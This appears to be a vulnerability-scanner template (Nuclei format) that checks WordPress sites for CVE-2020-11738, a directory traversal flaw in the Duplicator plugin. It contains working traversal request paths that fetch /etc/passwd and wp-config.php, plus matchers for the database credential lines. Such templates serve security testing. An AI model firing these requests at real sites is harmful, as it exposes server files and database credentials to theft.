id: CVE-2020-11738

info:
  name: WordPress Duplicator plugin Directory Traversal
  author: dwisiswant0
  severity: high
  description: |
    The issue is being actively exploited, and allows attackers
    to download arbitrary files, such as the wp-config.php file.
    According to the vendor, the vulnerability was only in two
    versions v1.3.24 and v1.3.26, the vulnerability wasn't
    present in versions 1.3.22 and before.

  reference: https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
  tags: cve,cve2020,wordpress,wp-plugin,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "File Transfer"
          - "application/octet-stream"
          - "attachment; filename=\"(wp-config\\.php|passwd)\""
        condition: and
        part: header
      - type: regex
        regex:
          - "root:[x*]:0:0:"
          - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
        condition: or
        part: body